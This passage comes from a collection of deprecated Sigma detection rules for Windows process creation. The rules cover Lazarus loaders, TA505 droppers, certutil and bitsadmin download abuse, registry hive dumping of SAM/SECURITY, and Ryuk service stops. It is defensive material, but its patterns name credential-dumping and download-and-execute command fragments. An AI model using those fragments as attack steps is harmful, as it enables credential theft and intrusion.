    "content": "title: GALLIUM Artefacts\nid: 18739897-21b1-41da-8ee4-5b786915a676\nrelated:\n    - id: 440a56bf-7873-4439-940a-1c8a671073c2\n      type: derived\nstatus: deprecated\ndescription: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.\nreferences:\n    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nauthor: Tim Burrell\ndate: 2020/02/07\nmodified: 2023/03/09\ntags:\n    - attack.credential_access\n    - attack.t1212\n    - attack.command_and_control\n    - attack.t1071\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    legitimate_process_path:\n        Image|contains:\n            - ':\\Program Files(x86)\\'\n            - ':\\Program Files\\'\n    legitimate_executable:\n        Hashes|contains: 'SHA1=e570585edc69f9074cb5e8a790708336bd45ca0f'\n    condition: legitimate_executable and not legitimate_process_path\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_hurricane_panda.yml",
    "content": "title: Hurricane Panda Activity\nid: 0eb2107b-a596-422e-b123-b389d5594ed7\nstatus: deprecated\ndescription: Detects Hurricane Panda Activity\nreferences:\n    - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/03/04\nmodified: 2023/03/10\ntags:\n    - attack.privilege_escalation\n    - attack.g0009\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n            - 'localgroup'\n            - 'admin'\n            - '/add'\n        - CommandLine|contains: '\\Win64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml",
    "content": "title: Lazarus Activity Apr21\nid: 4a12fa47-c735-4032-a214-6fab5b120670\nstatus: deprecated\ndescription: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity\nreferences:\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/\nauthor: Bhabesh Raj\ndate: 2021/04/20\nmodified: 2023/03/10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - 'mshta' # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3\n            - '.zip'\n    selection_2:\n        ParentImage: 'C:\\Windows\\System32\\wbem\\wmiprvse.exe' # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937\n        Image: 'C:\\Windows\\System32\\mshta.exe'\n    selection_3:\n        ParentImage|contains: ':\\Users\\Public\\'\n        Image: 'C:\\Windows\\System32\\rundll32.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Should not be any false positives\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_lazarus_loader.yml",
    "content": "title: Lazarus Loaders\nid: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e\nstatus: deprecated\ndescription: Detects different loaders as described in various threat reports on Lazarus group activity\nreferences:\n    - https://www.hvs-consulting.de/lazarus-report/\n    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020/12/23\nmodified: 2023/03/10\ntags:\n    - attack.g0032\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd1:\n        CommandLine|contains|all:\n            - 'cmd.exe /c '\n            - ' -p 0x'\n    selection_cmd2:\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - 'C:\\RECYCLER\\'\n    selection_rundll1:\n        CommandLine|contains|all:\n            - 'rundll32.exe '\n            - 'C:\\ProgramData\\'\n    selection_rundll2:\n        CommandLine|contains:\n            - '.bin,'\n            - '.tmp,'\n            - '.dat,'\n            - '.io,'\n            - '.ini,'\n            - '.db,'\n    condition: ( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_muddywater_dnstunnel.yml",
    "content": "title: DNS Tunnel Technique from MuddyWater\nid: 7454df60-1478-484b-810d-bff5d0ba6d4b\nstatus: deprecated\ndescription: Detecting DNS tunnel activity for Muddywater actor\nreferences:\n    - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/\n    - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html\nauthor: '@caliskanfurkan_'\ndate: 2020/06/04\nmodified: 2023/03/10\ntags:\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentImage|endswith: '\\excel.exe'\n        CommandLine|contains: 'DataExchange.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_ta505_dropper.yml",
    "content": "title: TA505 Dropper Load Pattern\nid: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\nstatus: deprecated\ndescription: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents\nreferences:\n    - https://twitter.com/ForensicITGuy/status/1334734244120309760\nauthor: Florian Roth (Nextron Systems)\ndate: 2020/12/08\nmodified: 2023/04/05\ntags:\n    - attack.execution\n    - attack.g0092\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\wmiprvse.exe'\n    selection_mshta:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'mshta.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml",
    "content": "title: File Download Via Bitsadmin To An Uncommon Target Folder\nid: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248\nstatus: deprecated\ndescription: Detects usage of bitsadmin downloading a file to uncommon target folder\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_folder:\n        CommandLine|contains:\n            - '%AppData%'\n            - '%temp%'\n            - '%tmp%'\n            - '\\AppData\\Local\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_certutil_susp_execution.yml",
    "content": "title: Suspicious Certutil Command Usage\nid: e011a729-98a6-4139-b5c4-bf6f6dd8239a\nstatus: deprecated\ndescription: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code\nreferences:\n    - https://twitter.com/JohnLaTwC/status/835149808817991680\n    - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/\n    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), juju4, keepwatch\ndate: 2019/01/16\nmodified: 2023/02/15\ntags:\n    - attack.defense_evasion\n    - attack.t1140\n    - attack.command_and_control\n    - attack.t1105\n    - attack.s0160\n    - attack.g0007\n    - attack.g0010\n    - attack.g0045\n    - attack.g0049\n    - attack.g0075\n    - attack.g0096\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -decode '\n            - ' -decodehex '\n            - ' -urlcache '\n            - ' -verifyctl '\n            - ' -encode '\n            - ' -exportPFX '\n            - ' /decode '\n            - ' /decodehex '\n            - ' /urlcache '\n            - ' /verifyctl '\n            - ' /encode '\n            - ' /exportPFX '\n    condition: all of selection_*\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cmd_read_contents.yml",
    "content": "title: Read and Execute a File Via Cmd.exe\nid: 00a4bacd-6db4-46d5-9258-a7d5ebff4003\nstatus: deprecated\ndescription: Detect use of \"/R <\" to read and execute a file via cmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md\nauthor: frack113\ndate: 2022/08/20\nmodified: 2023/03/07\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_read:\n        - ParentCommandLine|contains|all:\n            - 'cmd'\n            - '/r '\n            - '<'\n        - CommandLine|contains|all:\n            - 'cmd'\n            - '/r '\n            - '<'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cmd_redirect_to_stream.yml",
    "content": "title: Cmd Stream Redirection\nid: 70e68156-6571-427b-a6e9-4476a173a9b6\nstatus: deprecated\ndescription: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt\nauthor: frack113\ndate: 2022/02/04\nmodified: 2023/03/07\ntags:\n    - attack.defense_evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '> '\n            - ':'\n    filter:\n        CommandLine|contains: ' :\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_credential_acquisition_registry_hive_dumping.yml",
    "content": "title: Credential Acquisition via Registry Hive Dumping\nid: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\nstatus: deprecated\ndescription: Detects Credential Acquisition via Registry Hive Dumping\nreferences:\n    - https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html\nauthor: Tim Rauch\ndate: 2022/10/04\nmodified: 2023/02/06\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_2:\n        CommandLine|contains:\n            - ' save '\n            - ' export '\n    selection_3:\n        CommandLine|contains:\n            - 'hklm\\sam'\n            - 'hklm\\security'\n            - 'HKEY_LOCAL_MACHINE\\SAM'\n            - 'HKEY_LOCAL_MACHINE\\SECURITY'\n    condition: all of selection_*\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_cscript_vbs.yml",
    "content": "title: Visual Basic Script Execution\nid: 23250293-eed5-4c39-b57a-841c8933a57d\nstatus: deprecated\ndescription: Adversaries may abuse Visual Basic (VB) for execution\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md\nauthor: frack113\ndate: 2022/01/02\nmodified: 2023/03/06\ntags:\n    - attack.execution\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exe:\n        - OriginalFileName:\n            - 'cscript.exe'\n            - 'wscript.exe'\n        - Image|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    selection_script:\n        CommandLine|contains: '.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml",
    "content": "title: Execution via MSSQL Xp_cmdshell Stored Procedure\nid: 344482e4-a477-436c-aa70-7536d18a48c7\nrelated:\n    - id: d08dd86f-681e-4a00-a92c-1db218754417\n      type: derived\n    - id: 7f103213-a04e-4d59-8261-213dddf22314\n      type: derived\nstatus: deprecated\ndescription: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html\nauthor: Tim Rauch\ndate: 2022/09/28\nmodified: 2023/03/06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_parent:\n        ParentImage|endswith: '\\sqlservr.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_filefix_browsers.yml",
    "content": "title: FileFix - Suspicious Child Process from Browser File Upload Abuse\nid: 4be03877-d5b6-4520-85c9-a5911c0a656c\nstatus: deprecated\ndescription: |\n    Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the \"FileFix\" social engineering technique,\n    where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.\n    The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.\nreferences:\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: 0xFustang\ndate: 2025-06-26\nmodified: 2025-11-24\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n        CommandLine|contains: '#'\n    condition: selection\nfalsepositives:\n    - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_indirect_cmd.yml",
    "content": "title: Indirect Command Execution\nid: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\nstatus: deprecated\ndescription: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019/10/24\nmodified: 2023/01/04\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\pcalua.exe'\n            - '\\forfiles.exe'\n    condition: selection\nfields:\n    - ComputerName\n    - User\n    - ParentCommandLine\n    - CommandLine\nfalsepositives:\n    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.\n    - Legitimate usage of scripts.\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_indirect_command_execution_forfiles.yml",
    "content": "title: Indirect Command Exectuion via Forfiles\nid: a85cf4e3-56ee-4e79-adeb-789f8fb209a8\nrelated:\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: deprecated\ndescription: Detects execition of commands and binaries from the context of \"forfiles.exe\". This can be used as a LOLBIN in order to bypass application whitelisting.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a\n    - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\nauthor: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022/10/17\nmodified: 2023/01/04\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\forfiles.exe'\n    selection_c:\n        ParentCommandLine|contains:\n            - ' /c '\n            - ' -c '\n    selection_p:\n        ParentCommandLine|contains:\n            - ' /p '\n            - ' -p '\n    selection_m:\n        ParentCommandLine|contains:\n            - ' /m '\n            - ' -m '\n    filter:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'xcopy'\n            - 'cmd /c del'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER\nid: 056a7ee1-4853-4e67-86a0-3fd9ceed7555\nstatus: deprecated\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2023/02/21\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32\nid: 36c5146c-d127-4f85-8e21-01bf62355d5a\nstatus: deprecated\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019/10/08\nmodified: 2022/12/30\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        CommandLine|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbas_execution_of_wuauclt.yml",
    "content": "title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL\nid: ba1bb0cb-73da-42de-ad3a-de10c643a5d0\nstatus: experimental\ndescription: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: Sreeman\ndate: 2020/10/29\nmodified: 2022/05/27\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'wuauclt.exe'\n            - '/UpdateDeploymentProvider'\n            - '/Runhandlercomserver'\n    filter:\n        CommandLine|contains:\n            - 'wuaueng.dll'\n            - 'UpdateDeploymentProvider.dll /ClassId'\n    condition: selection and not filter\nfalsepositives:\n    - Wuaueng.dll which is a module belonging to Microsoft Windows Update.\nfields:\n    - CommandLine\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.execution\n    - attack.t1218\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_findstr.yml",
    "content": "title: Abusing Findstr for Defense Evasion\nid: bf6c39fc-e203-45b9-9538-05397c1b4f3f\nstatus: deprecated\ndescription: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali'\ndate: 2020/10/05\nmodified: 2022/10/12\ntags:\n    - attack.defense_evasion\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_download_1:\n        CommandLine|contains:\n            - ' /v '\n            - ' -v '\n    selection_cli_download_2:\n        CommandLine|contains:\n            - ' /l '\n            - ' -l '\n    selection_cli_creds_1:\n        CommandLine|contains:\n            - ' /s '\n            - ' -s '\n    selection_cli_creds_2:\n        CommandLine|contains:\n            - ' /i '\n            - ' -i '\n    condition: selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)\nfalsepositives:\n    - Administrative findstr usage\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_office.yml",
    "content": "title: Suspicious File Download Using Office Application\nid: 0c79148b-118e-472b-bdb7-9b57b444cc19\nstatus: test\ndescription: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\n    - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nauthor: Beyu Denis, oscd.community\ndate: 2019/10/26\nmodified: 2023/02/04\ntags:\n    - attack.command_and_control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\excel.exe'\n        CommandLine|contains: 'http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbin_rdrleakdiag.yml",
    "content": "title: Process Memory Dumped Via RdrLeakDiag.EXE\nid: 6355a919-2e97-4285-a673-74645566340d\nstatus: deprecated\ndescription: Detects use of the rdrleakdiag.exe LOLBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/01/04\nmodified: 2023/04/24\ntags:\n    - attack.defense_evasion\n    - attack.t1036\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\rdrleakdiag.exe'\n        CommandLine|contains: '/fullmemdmp'\n    selection2:\n        CommandLine|contains|all:\n            - '/fullmemdmp'\n            - ' /o '\n            - ' /p '\n    condition: selection1 or selection2\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_lolbins_by_office_applications.yml",
    "content": "title: New Lolbin Process by Office Applications\nid: 23daeb52-e6eb-493c-8607-c4f0246cb7d8\nstatus: deprecated\ndescription: Detects Office applications spawning a new LOLBin process. This activity is suspicious and should be investigated.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml\n    - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\n    - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)'\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection:\n        Image|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\mshta.exe'\n            - '\\verclsid.exe'\n            - '\\msdt.exe'\n            - '\\control.exe'\n            - '\\msidb.exe'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_mal_ryuk.yml",
    "content": "title: Ryuk Ransomware Command Line Activity\nid: 0acaad27-9f02-4136-a243-c357202edd74\nrelated:\n    - id: c37510b8-2107-4b78-aa32-72f251e7a844\n      type: similar\nstatus: deprecated\ndescription: Detects Ryuk Ransomware command lines\nreferences:\n    - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nauthor: Vasiliy Burov\ndate: 2019/08/06\nmodified: 2023/02/03\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'stop'\n    selection2:\n        CommandLine|contains:\n            - 'samss'\n            - 'audioendpointbuilder'\n            - 'unistoresvc_'\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_malware_trickbot_recon_activity.yml",
    "content": "title: Trickbot Malware Reconnaissance Activity\nid: 410ad193-a728-4107-bc79-4419789fcbf8\nrelated:\n    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\n      type: similar\nstatus: deprecated\ndescription: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.\nreferences:\n    - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: David Burkett, Florian Roth\ndate: 2019/12/28\nmodified: 2023/04/28\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\cmd.exe'\n        Image|endswith: '\\nltest.exe'\n        CommandLine|contains: '/domain_trusts /all_trusts'\n    condition: selection\nfalsepositives:\n    - Rare System Admin Activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_mavinject_proc_inj.yml",
    "content": "title: MavInject Process Injection\nid: 17eb8e57-9983-420d-ad8a-2c4976c22eb8\nstatus: deprecated\ndescription: Detects process injection using the signed Windows tool Mavinject32.exe\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152\ndate: 2018/12/12\nmodified: 2022/12/19\ntags:\n    - attack.t1055.001\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /INJECTRUNNING '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_msdt_diagcab.yml",
